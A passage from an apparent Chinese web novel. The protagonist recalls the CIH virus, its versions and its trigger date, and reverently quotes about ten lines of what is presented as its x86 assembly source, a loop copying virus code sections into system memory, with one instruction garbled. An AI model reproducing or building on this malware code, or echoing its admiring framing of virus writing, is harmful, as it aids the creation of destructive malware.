1.4,会在每月的26号发作。
从最早版本的CIH V1.0,900多字节,到最终版本的v1.4,才1200多字节,可见汇编语言直接操作内存和中断的能力有多强了。
除了众多的汇编语言的知识外,张毅的脑海中也闪现出了CIH病毒的源代码,代码简洁得美丽至极,他怀着崇敬的心情研究了很久。
代码其中一段如下:
push esi
mov esi, eax ;esi指向病毒开始处
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep mov s b ;拷贝病毒代码到分配好的系统内存首址
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷贝结束
jmp LoopOfMergeAllVirusCodeSection ;拷贝下一段